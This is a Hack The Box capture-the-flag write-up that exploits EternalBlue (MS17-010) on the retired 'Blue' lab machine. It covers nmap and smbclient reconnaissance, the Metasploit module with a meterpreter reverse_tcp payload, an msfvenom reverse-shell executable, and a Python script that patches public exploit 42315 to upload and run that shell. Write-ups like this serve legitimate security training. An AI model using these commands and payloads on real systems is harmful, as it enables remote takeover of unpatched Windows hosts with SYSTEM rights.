Hack The Box — Blue

Write Up

0th3r_
Jan 19, 2021

Information

Blue is an easy retired machine on Hack The Box by ch4p. The vulnerability on this machine is MS17-010, also known as 'EternalBlue', a remote code execution bug in the SMBv1 server. We exploit it first with the Metasploit module and then with a public Python exploit. This writeup will not include any passwords, cracked hashes or flags.

Blue — Info Card

Scanning

We will start off by running an NMAP scan against the target IP:

nmap -p- -sV -oN blue-scan 10.10.10.40

From the results we can see that ports 139 and 445 are open, and the version scan identifies the host as Windows 7. We will move on to investigating SMB.

Investigating SMB

We will connect to SMB using smbclient and see what is available:

smbclient -L 10.10.10.40
Investigating the target with smbclient

We can see two disk shares, one called 'Share' and one called 'Users'. We will look at both of these:

smbclient \\\\10.10.10.40\\Share
Investigating ‘Share’ using smbclient

There is nothing in ‘Share’ so let’s try ‘Users’:

smbclient \\\\10.10.10.40\\Users
Investigating ‘Users’ using smbclient

We have access to a file share but nothing really interesting. Given the Windows version our scan picked up, we will check whether the server is vulnerable to EternalBlue:

nmap -p 139,445 --script smb-vuln-ms17-010 10.10.10.40
Discovering MS17–010 vulnerability on target using nmap

The script reports the host as VULNERABLE to MS17-010. We will investigate ways to exploit this vulnerability.

Exploiting SMB using Metasploit

We will start msfconsole:

msfconsole -q

And search for MS17–010:

search ms17-010
Looking up MS17–010 using Metasploit

From the results we want the EternalBlue exploit module, exploit/windows/smb/ms17_010_eternalblue, which is the second result here (the index numbers depend on your Metasploit version, so check the list rather than copying the number blindly):

use 2

Now we can look at the options:

options
MS17–010 options in Metasploit

We will set RHOST to our target's IP:

set RHOST 10.10.10.40
Setting target host on Metasploit module

We will also set our payload:

set payload windows/x64/meterpreter/reverse_tcp

We will need to set our listener IP:

set LHOST 10.10.14.7

Before we run the exploit, let's use check to make sure the target is vulnerable. This is worth doing: a failed EternalBlue attempt can crash the target, which on Hack The Box means waiting for a reset.

check
Running a check against the target using Metasploit

Now we are ready to run the exploit:

run

The exploit completes and we get a Meterpreter session:

Getting a Meterpreter session using Metasploit

We use the 'shell' command to drop into a Windows command shell, and we can see that we are NT AUTHORITY\SYSTEM:

shell

From here, we can read the user.txt and root.txt files. No privilege escalation is needed: EternalBlue is a kernel exploit, so the session it hands us is already SYSTEM.

Next, we will look at how to exploit this without Metasploit, using a publicly available Python version of the EternalBlue exploit.

Exploiting SMB — Python Script

We will use searchsploit to find an exploit:

searchsploit MS17-010
Using searchsploit to locate exploit

We find a list of exploits, one of which (EDB-ID 42315, the Windows 7/2008 R2 x64 version) matches the Windows version on our target. We will copy it into our working directory:

searchsploit -m 42315

Looking at the exploit, we have to meet a few conditions and make a few adjustments. First, the exploit imports a module called mysmb.py, so that file has to be present. Second, the payload it delivers has to be changed to one that suits us. Third, the exploit needs credentials to set up its SMB session. We do not have a password, but the 'guest' account is enabled on this service and is enough.

We already have mysmb.py in our working directory, but if needed it can be downloaded from the same exploit-db repository, where it is stored under the name 42315.py (it originally comes from worawit's MS17-010 repository on GitHub, which is another place to get it). Because a file called 42315.py already exists locally, wget saves the download as 42315.py.1, which we then rename:

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py
mv 42315.py.1 mysmb.py

Next, we will generate a reverse shell executable using msfvenom. windows/shell_reverse_tcp is a 32-bit, unstaged payload: it runs fine under WoW64 on the x64 target and only needs a plain netcat listener on our side:

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.7 LPORT=4444 > eternal-blue.exe

With the reverse shell executable in our working directory, we now edit the exploit so that it delivers and runs that file instead of its default post-exploitation action. Near the bottom of the script, in the function that runs once the exploit has succeeded, lines 922 and 923 are commented out. We uncomment them and change them so that the first line uploads eternal-blue.exe from our attack machine to the target over the admin share, and the second executes it once it is there.

Finally, we need to adjust the login details. The username and password settings near the top of the script must include, at least, a valid user. We know 'guest' is valid, so we use that with an empty password in our adjusted script.
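To make those three edits concrete, here is an added example that applies them with a script rather than by hand. This is not part of the original post and not the exploit's own code. It assumes the exploit keeps its credentials in USERNAME and PASSWORD variables and ships its upload and execute calls, smb_send_file(...) and service_exec(...), as commented-out lines inside smb_pwn(), which is what lines 922 and 923 are in 42315.py. The local path /root/htb/blue/eternal-blue.exe is an assumption, and SAMPLE_EXPLOIT is a constructed stand-in for the relevant lines of the real file so the patcher can be exercised without it.

```python
#!/usr/bin/env python3
"""Patch a copy of 42315.py so it uploads and runs our msfvenom reverse shell.

Added example for the Blue writeup: makes the same three edits the text
describes (credentials, upload line, execute line) and refuses to write
anything if the lines it expects are not found, rather than half-patching.
"""
import re
import sys

# Constructed stand-in for the parts of 42315.py we touch: the credential
# assignments near the top and the two commented-out calls in smb_pwn().
# This is NOT the real exploit; it only mirrors the shape of those lines.
SAMPLE_EXPLOIT = r"""
USERNAME = ''
PASSWORD = ''

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
"""


def _replace_line(text, pattern, build):
    """Replace the first line matching pattern; build(match) returns the new line."""
    new_text, count = re.subn(pattern, build, text, count=1, flags=re.MULTILINE)
    if count != 1:
        raise ValueError("expected line not found: %s" % pattern)
    return new_text


def set_credentials(text, username, password=""):
    """Point the exploit's SMB login at a valid account (guest works on Blue)."""
    text = _replace_line(text, r"^USERNAME\s*=.*$", lambda m: "USERNAME = %r" % username)
    text = _replace_line(text, r"^PASSWORD\s*=.*$", lambda m: "PASSWORD = %r" % password)
    return text


def set_payload(text, local_exe, remote_name):
    r"""Uncomment and rewrite the upload/execute pair to deliver local_exe.

    smb_send_file copies through the C$ share, so the remote path is share
    relative ('/eternal-blue.exe'); service_exec runs it through cmd.exe, so
    that line needs the drive-letter form (c:\eternal-blue.exe).
    """
    share_path = "/" + remote_name
    win_path = "c:\\" + remote_name
    upload = "smb_send_file(smbConn, %r, 'C', %r)" % (local_exe, share_path)
    execute = "service_exec(conn, r'cmd /c %s')" % win_path
    # Keep the original indentation (group 1) so the lines stay inside smb_pwn().
    text = _replace_line(text, r"^([ \t]*)#[ \t]*smb_send_file\(.*$",
                         lambda m: m.group(1) + upload)
    text = _replace_line(text, r"^([ \t]*)#[ \t]*service_exec\(.*$",
                         lambda m: m.group(1) + execute)
    return text


def patch_exploit(text, local_exe, remote_name, username, password=""):
    """All three edits in one go; raises ValueError instead of half-patching."""
    return set_payload(set_credentials(text, username, password), local_exe, remote_name)


if __name__ == "__main__":
    # Usage: python3 patch_42315.py 42315.py /root/htb/blue/eternal-blue.exe
    src, exe = sys.argv[1], sys.argv[2]
    with open(src) as f:
        original = f.read()
    patched = patch_exploit(original, exe, "eternal-blue.exe", "guest")
    with open(src, "w") as f:
        f.write(patched)
    print("patched %s to upload and run %s as guest" % (src, exe))
```

Run it against your copy of 42315.py and then diff the result against a pristine copy: the only changes should be the two credential assignments and the two lines in smb_pwn(). If the script raises ValueError, the copy you have differs from the one described here and the edits should be made by hand instead.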

Next, we will setup our listener:

nc -lvnp 4444

And finally run the exploit against the target (the script is written for Python 2 and needs impacket installed):

python 42315.py 10.10.10.40

The exploit runs, and our listener receives a reverse shell connection as NT AUTHORITY\SYSTEM.

From here we can collect the flags as before.


Hi, I’m Ben. This blog is for my write-ups on my journey through learning in infosec. I am OSCP certified and currently looking for experience in the industry.